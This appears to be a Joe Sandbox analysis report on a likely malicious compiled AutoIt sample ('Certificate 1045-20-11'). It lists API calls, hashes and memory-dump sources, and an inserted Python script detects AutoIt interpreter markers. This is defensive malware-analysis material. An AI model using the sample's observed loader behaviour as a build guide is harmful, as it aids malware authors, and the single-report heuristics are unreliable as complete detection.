• Instruction Fuzzy Hash: 73729C70904209AFCF14DF98C481AAEB7B5FF48345F14805AED06EB391DB35AE49CB92
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
• Opcode ID: 69b6e8439ceb9196e218c32f9b66e9607f053939aecea53c06e0b1a999ca50ee
• Instruction ID: b14cbff28bf35f2781ddf29f1ed757bd5f660f8cfbba51fbf66cd52231b19d04
• Opcode Fuzzy Hash: 69b6e8439ceb9196e218c32f9b66e9607f053939aecea53c06e0b1a999ca50ee
• Instruction Fuzzy Hash: 4C9247706083419FD724DF18C484B6ABBE1FF88348F14886DE99ACB362D775E949CB52
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0084E959
• timeGetTime.WINMM ref: 0084EBFA
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0084ED2E
• TranslateMessage.USER32(?), ref: 0084ED3F
• DispatchMessageW.USER32(?), ref: 0084ED4A
• LockWindowUpdate.USER32(00000000), ref: 0084ED79
• DestroyWindow.USER32 ref: 0084ED85
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084ED9F
• Sleep.KERNEL32(0000000A), ref: 008B5270
• TranslateMessage.USER32(?), ref: 008B59F7
• DispatchMessageW.USER32(?), ref: 008B5A05
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008B5A19
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 2641332412-570651680
• Opcode ID: ca5ddb64a7b8cb738c868f6193436d41089a267e7e7f62da342199bffebf1a5f
• Instruction ID: fa2ed7dbb3c513cfba0af2c958134b4426b2587df3e5a036ddf2a3a7fe705d59
• Opcode Fuzzy Hash: ca5ddb64a7b8cb738c868f6193436d41089a267e7e7f62da342199bffebf1a5f
• Instruction Fuzzy Hash: 9A628E70508348DFEB24DF28C885BAA77E4FF54304F18496DF98ADB292DB759848CB52
                                                                                APIs
                                                                                • ___createFile.LIBCMT ref: 00875EC3
                                                                                • ___createFile.LIBCMT ref: 00875F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00875F2D
                                                                                • __dosmaperr.LIBCMT ref: 00875F34
                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00875F47
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00875F6A
                                                                                • __dosmaperr.LIBCMT ref: 00875F73
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00875F7C
                                                                                • __set_osfhnd.LIBCMT ref: 00875FAC
                                                                                • __lseeki64_nolock.LIBCMT ref: 00876016
                                                                                • __close_nolock.LIBCMT ref: 0087603C
                                                                                • __chsize_nolock.LIBCMT ref: 0087606C
                                                                                • __lseeki64_nolock.LIBCMT ref: 0087607E
                                                                                • __lseeki64_nolock.LIBCMT ref: 00876176
                                                                                • __lseeki64_nolock.LIBCMT ref: 0087618B
                                                                                • __close_nolock.LIBCMT ref: 008761EB
                                                                                  • Part of subcall function 0086EA9C: CloseHandle.KERNELBASE(00000000,008EEEF4,00000000,?,00876041,008EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0086EAEC
                                                                                  • Part of subcall function 0086EA9C: GetLastError.KERNEL32(?,00876041,008EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0086EAF6
                                                                                  • Part of subcall function 0086EA9C: __free_osfhnd.LIBCMT ref: 0086EB03
                                                                                  • Part of subcall function 0086EA9C: __dosmaperr.LIBCMT ref: 0086EB25
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • __lseeki64_nolock.LIBCMT ref: 0087620D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00876342
                                                                                • ___createFile.LIBCMT ref: 00876361
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0087636E
                                                                                • __dosmaperr.LIBCMT ref: 00876375
                                                                                • __free_osfhnd.LIBCMT ref: 00876395
                                                                                • __invoke_watson.LIBCMT ref: 008763C3
                                                                                • __wsopen_helper.LIBCMT ref: 008763DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                • String ID: @
                                                                                • API String ID: 3896587723-2766056989
                                                                                • Opcode ID: a84865f918484433e29dba2266631999c84d4b857f7d13d2615eea71c8503aa7
                                                                                • Instruction ID: f7d58f5d723aff2e75db7f707d7007a351bc680868100ac6311b5e4da6e776f3
                                                                                • Opcode Fuzzy Hash: a84865f918484433e29dba2266631999c84d4b857f7d13d2615eea71c8503aa7
                                                                                • Instruction Fuzzy Hash: 36224971904A099FEB259F68CC45BBD7B21FB10328F28C128E529E72DAE775CD60C791

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _wcscpy.LIBCMT ref: 0088FA96
                                                                                • _wcschr.LIBCMT ref: 0088FAA4
                                                                                • _wcscpy.LIBCMT ref: 0088FABB
                                                                                • _wcscat.LIBCMT ref: 0088FACA
                                                                                • _wcscat.LIBCMT ref: 0088FAE8
                                                                                • _wcscpy.LIBCMT ref: 0088FB09
                                                                                • __wsplitpath.LIBCMT ref: 0088FBE6
                                                                                • _wcscpy.LIBCMT ref: 0088FC0B
                                                                                • _wcscpy.LIBCMT ref: 0088FC1D
                                                                                • _wcscpy.LIBCMT ref: 0088FC32
                                                                                • _wcscat.LIBCMT ref: 0088FC47
                                                                                • _wcscat.LIBCMT ref: 0088FC59
                                                                                • _wcscat.LIBCMT ref: 0088FC6E
                                                                                  • Part of subcall function 0088BFA4: _wcscmp.LIBCMT ref: 0088C03E
                                                                                  • Part of subcall function 0088BFA4: __wsplitpath.LIBCMT ref: 0088C083
                                                                                  • Part of subcall function 0088BFA4: _wcscpy.LIBCMT ref: 0088C096
                                                                                  • Part of subcall function 0088BFA4: _wcscat.LIBCMT ref: 0088C0A9
                                                                                  • Part of subcall function 0088BFA4: __wsplitpath.LIBCMT ref: 0088C0CE
                                                                                  • Part of subcall function 0088BFA4: _wcscat.LIBCMT ref: 0088C0E4
                                                                                  • Part of subcall function 0088BFA4: _wcscat.LIBCMT ref: 0088C0F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                • API String ID: 2955681530-2806939583
                                                                                • Opcode ID: d6b4d67f68e528296fb9e017a0a4610172bf3b21b1fb181fd682f4399c298bea
                                                                                • Instruction ID: b2c39a84439a5ab3bce3ff75a6e8303f67dccc1b2f0725ec96af0a93e6d40cbd
                                                                                • Opcode Fuzzy Hash: d6b4d67f68e528296fb9e017a0a4610172bf3b21b1fb181fd682f4399c298bea
                                                                                • Instruction Fuzzy Hash: 8391A171504305AFCB20EF58C951E9BB3E9FF94310F004969FA99D7292DB34EA44CB96

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00843F86
                                                                                • RegisterClassExW.USER32(00000030), ref: 00843FB0
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00843FC1
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00843FDE
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00843FEE
                                                                                • LoadIconW.USER32(000000A9), ref: 00844004
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00844013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 3813639218cc89d73fdfb2058b9216a096a4bb587d38693fccd29cd88d0927da
                                                                                • Instruction ID: 21a07735c56a65fd0064815fed99b211c34c0fa8e70c961f300b2cdde71db079
                                                                                • Opcode Fuzzy Hash: 3813639218cc89d73fdfb2058b9216a096a4bb587d38693fccd29cd88d0927da
                                                                                • Instruction Fuzzy Hash: B921D6B5D14318AFDB00EFA4EC89BCDBBB4FB08704F00822AFA15A62A0D7B54544DF91
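                                                                                The two entries above expose the strings that mark the AutoIt v3 interpreter stub: ">>>AUTOIT SCRIPT<<<", which the script loader compares with _wcscmp, and the "AutoIt v3 GUI" / "AutoIt v3" window classes handed to RegisterClassExW. Markers of this kind are what a "compiled AutoIt script" signature keys on. The script below is an added example, not code from this report or from Joe Sandbox, that scans a file image for those markers. The one caveat it demonstrates: because the runtime passes these strings to wide-character APIs, they are stored as UTF-16LE, so a narrow-string grep alone misses them. The input images are constructed inline and are not real memory dumps; the helper names are the example's own.

```python
"""Triage check: does a file image carry the AutoIt v3 interpreter markers?

Added example, not part of the sandbox report. The markers are the strings the
report lists for the AutoIt runtime functions. They are searched in UTF-16LE
first (how the binary actually stores them) and in ASCII as a fallback.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Strings shown in the report's AutoIt runtime functions.
LOADER_MARKER = ">>>AUTOIT SCRIPT<<<"
AUTOIT_MARKERS = (
    LOADER_MARKER,      # compared with _wcscmp in the script loader
    "AutoIt v3 GUI",    # window class registered with RegisterClassExW
    "AutoIt v3",        # second window class string in the report
)


@dataclass
class MarkerHit:
    marker: str
    encoding: str   # "utf-16-le" or "ascii"
    offset: int


@dataclass
class AutoItScanResult:
    hits: list[MarkerHit] = field(default_factory=list)

    @property
    def is_compiled_autoit(self) -> bool:
        # Require the loader marker, not just a window-class name: plenty of
        # unrelated software mentions "AutoIt v3" in plain text.
        return any(h.marker == LOADER_MARKER for h in self.hits)


def scan_for_autoit(image: bytes) -> AutoItScanResult:
    """Return every marker occurrence, in both encodings, sorted by offset."""
    result = AutoItScanResult()
    for marker in AUTOIT_MARKERS:
        for encoding in ("utf-16-le", "ascii"):
            needle = marker.encode(encoding)
            for m in re.finditer(re.escape(needle), image):
                result.hits.append(MarkerHit(marker, encoding, m.start()))
    result.hits.sort(key=lambda h: h.offset)
    return result


def scan_file(path: str) -> AutoItScanResult:
    """Convenience wrapper for a real sample or a dumped image on disk."""
    with open(path, "rb") as fh:
        return scan_for_autoit(fh.read())


def summarize(image: bytes) -> str:
    r = scan_for_autoit(image)
    lines = [f"{h.marker!r} ({h.encoding}) at 0x{h.offset:x}" for h in r.hits]
    verdict = ("AutoIt loader marker present (likely compiled AutoIt script)"
               if r.is_compiled_autoit else "no AutoIt loader marker")
    return "\n".join(lines + [verdict])


# --- constructed sample inputs (hypothetical, not real dumps) ---
def _fake_image(*strings: bytes) -> bytes:
    body = b"MZ" + b"\x00" * 60            # fake header
    for s in strings:
        body += b"\x90" * 16 + s + b"\x00\x00"
    return body + b"\xcc" * 32


# Wide strings, as the AutoIt runtime stores them.
SAMPLE_AUTOIT = _fake_image(
    "AutoIt v3 GUI".encode("utf-16-le"),
    LOADER_MARKER.encode("utf-16-le"),
)
# Only a narrow mention of the product name, no loader marker.
SAMPLE_BENIGN = _fake_image(b"AutoIt v3 installer notes")


if __name__ == "__main__":
    print(summarize(SAMPLE_AUTOIT))
    print("---")
    print(summarize(SAMPLE_BENIGN))
```

                                                                                Run it against a suspected sample with scan_file(path). A hit on the loader marker is a strong sign that the file is the AutoIt interpreter with an embedded script, which is what the report's "Binary is likely a compiled AutoIt script file" signature says; it does not by itself say what the script does, so the next step is extracting and decompiling the embedded script rather than trusting the string alone.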

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0088BDB4: __time64.LIBCMT ref: 0088BDBE
                                                                                  • Part of subcall function 00844517: _fseek.LIBCMT ref: 0084452F
                                                                                • __wsplitpath.LIBCMT ref: 0088C083
                                                                                  • Part of subcall function 00861DFC: __wsplitpath_helper.LIBCMT ref: 00861E3C
                                                                                • _wcscpy.LIBCMT ref: 0088C096
                                                                                • _wcscat.LIBCMT ref: 0088C0A9
                                                                                • __wsplitpath.LIBCMT ref: 0088C0CE
                                                                                • _wcscat.LIBCMT ref: 0088C0E4
                                                                                • _wcscat.LIBCMT ref: 0088C0F7
                                                                                • _wcscmp.LIBCMT ref: 0088C03E
                                                                                  • Part of subcall function 0088C56D: _wcscmp.LIBCMT ref: 0088C65D
                                                                                  • Part of subcall function 0088C56D: _wcscmp.LIBCMT ref: 0088C670
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0088C2A1
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0088C338
                                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0088C34E
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0088C35F
                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0088C371
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                • String ID:
                                                                                • API String ID: 2378138488-0
                                                                                • Opcode ID: d603a6279340f421b839fb33e594d8c59f5a0a555e8513fcac2f7cd2b38d5579
                                                                                • Instruction ID: 326cb36cedf085c2dd081cc08a0a17b9c1f6e28126efa053474f5f72531b7497
                                                                                • Opcode Fuzzy Hash: d603a6279340f421b839fb33e594d8c59f5a0a555e8513fcac2f7cd2b38d5579
                                                                                • Instruction Fuzzy Hash: 63C12CB1900219AFDF11EFA9CC85EDEB7B8FF49310F1040A6F609E6255DB709A848F65

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered as an interactive image on the original page; only the basic-block summary is recoverable here). Window procedure starting at 843742. Blocks that reach an API: 8437ab-8437b3 DefWindowProcW (the common fallthrough), 8437da-8437ed KillTimer, 8437f6-84381d SetTimer and RegisterWindowMessageW, 84381f-84382a CreatePopupMenu, 84382c-843834 PostQuitMessage, 8b1dcb-8b1dd7 SetFocus, 8b1ddc-8b1dfb MoveWindow. Internal helper calls: 842ff6, 843847, 84390f, 844ffc, 85e312, 85eb83, 87a5f3, 884ddd, 8855bd.
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 008437B3
                                                                                • KillTimer.USER32(?,00000001), ref: 008437DD
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00843800
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0084380B
                                                                                • CreatePopupMenu.USER32 ref: 0084381F
                                                                                • PostQuitMessage.USER32(00000000), ref: 0084382E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: cf61cd68913a1cc8407b51652ab609866be85f38786b6ddf59ebeb1a87d2274c
                                                                                • Instruction ID: 058d9a0f929e15bda1cc6610afcfdc2e5ffc2f0526f55a92b8c1cced218b9e18
                                                                                • Opcode Fuzzy Hash: cf61cd68913a1cc8407b51652ab609866be85f38786b6ddf59ebeb1a87d2274c
                                                                                • Instruction Fuzzy Hash: FA4106F111834DAFDF246F689C4EFBA36A5FB14305F440135FA82D62A1DB709E40A762

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00843E79
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00843E88
                                                                                • LoadIconW.USER32(00000063), ref: 00843E9E
                                                                                • LoadIconW.USER32(000000A4), ref: 00843EB0
                                                                                • LoadIconW.USER32(000000A2), ref: 00843EC2
                                                                                  • Part of subcall function 00844024: LoadImageW.USER32(00840000,00000063,00000001,00000010,00000010,00000000), ref: 00844048
                                                                                • RegisterClassExW.USER32(?), ref: 00843F30
                                                                                  • Part of subcall function 00843F53: GetSysColorBrush.USER32(0000000F), ref: 00843F86
                                                                                  • Part of subcall function 00843F53: RegisterClassExW.USER32(00000030), ref: 00843FB0
                                                                                  • Part of subcall function 00843F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00843FC1
                                                                                  • Part of subcall function 00843F53: InitCommonControlsEx.COMCTL32(?), ref: 00843FDE
                                                                                  • Part of subcall function 00843F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00843FEE
                                                                                  • Part of subcall function 00843F53: LoadIconW.USER32(000000A9), ref: 00844004
                                                                                  • Part of subcall function 00843F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00844013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: bd1a073773a26f35d9b85364bbfb073de507a0562b1c6cc3e41ea9c69e4159c0
                                                                                • Instruction ID: af1b089cd4566f282aef1394a8a3b051139a56a91081fa2f050e4802748c35b5
                                                                                • Opcode Fuzzy Hash: bd1a073773a26f35d9b85364bbfb073de507a0562b1c6cc3e41ea9c69e4159c0
                                                                                • Instruction Fuzzy Hash: 7A2135B0D18304AFCB44DFA9EC45A99BFF9FB48310F00412AE614E72A0D77546449F91

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered as an interactive image on the original page; only the basic-block summary is recoverable here). Routine starting at 86acb3. Blocks that reach an API: 86ad42-86ad51 GetStartupInfoW, 86add7-86ade3 and 86aedb-86aee4 GetFileType, 86ade5-86ae1a and 86af08-86af1a InitializeCriticalSectionAndSpinCount, 86aec9-86aed5 GetStdHandle. Internal helper calls: 866986, 866ac0, 866b05, 867cf4, 86af58, 86e880.
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 0086ACC1
                                                                                  • Part of subcall function 00867CF4: __mtinitlocknum.LIBCMT ref: 00867D06
                                                                                  • Part of subcall function 00867CF4: EnterCriticalSection.KERNEL32(00000000,?,00867ADD,0000000D), ref: 00867D1F
                                                                                • __calloc_crt.LIBCMT ref: 0086ACD2
                                                                                  • Part of subcall function 00866986: __calloc_impl.LIBCMT ref: 00866995
                                                                                  • Part of subcall function 00866986: Sleep.KERNEL32(00000000,000003BC,0085F507,?,0000000E), ref: 008669AC
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0086ACED
                                                                                • GetStartupInfoW.KERNEL32(?,008F6E28,00000064,00865E91,008F6C70,00000014), ref: 0086AD46
                                                                                • __calloc_crt.LIBCMT ref: 0086AD91
                                                                                • GetFileType.KERNEL32(00000001), ref: 0086ADD8
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0086AE11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1426640281-0
                                                                                • Opcode ID: f3647b90ba2ad487444f8f144c23f1f6c89ff274e404e49c394df1fee3ac9331
                                                                                • Instruction ID: 95bb3613c36372a52da9239534ba4abec5ff863fbc8e5600ebfcebf934cf316e
                                                                                • Opcode Fuzzy Hash: f3647b90ba2ad487444f8f144c23f1f6c89ff274e404e49c394df1fee3ac9331
                                                                                • Instruction Fuzzy Hash: 99819CB19052458FDB18CF68C8805A9BBF0FF49324B25426ED4A6FB3D1D7359802DF56

Control-flow Graph
• Control-flow graph (rendered as an image in the original; executed/not-executed colouring not recoverable) for the function at 00EB0168: basic blocks 00EB0168-00EB046A; calls 00EADB58, 00EB1078, CreateFileW, VirtualAlloc (twice), ReadFile, 00EB12C8 (twice), 00EB10D8, CloseHandle, VirtualFree (twice). The block at 00EB0386 branches back to the CreateFileW block at 00EB021D, so the file open is retried in a loop.
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EB0239
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EB045F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID: S
                                                                                • API String ID: 204039940-2719959225
                                                                                • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                • Instruction ID: dea362163815c27de6f898fbb1748d17a6e6cb39f16aed1eea4d0fa33bb694bf
                                                                                • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                • Instruction Fuzzy Hash: 8CA10770E00209EBDB14CFA4C998BEFB7B5BF48304F209159E615BB291D775AA85CB50

Control-flow Graph
• Control-flow graph (rendered as an image in the original; executed/not-executed colouring not recoverable) for the function at 008449FB: basic blocks 008449FB-008B424F; calls 0084BCCE, RegOpenKeyExW, RegQueryValueExW (twice), 0085F4EA, 008447B7, 00846A63, 008447E2, RegCloseKey.
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00844A1D
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008B41DB
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008B421A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 008B4249
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
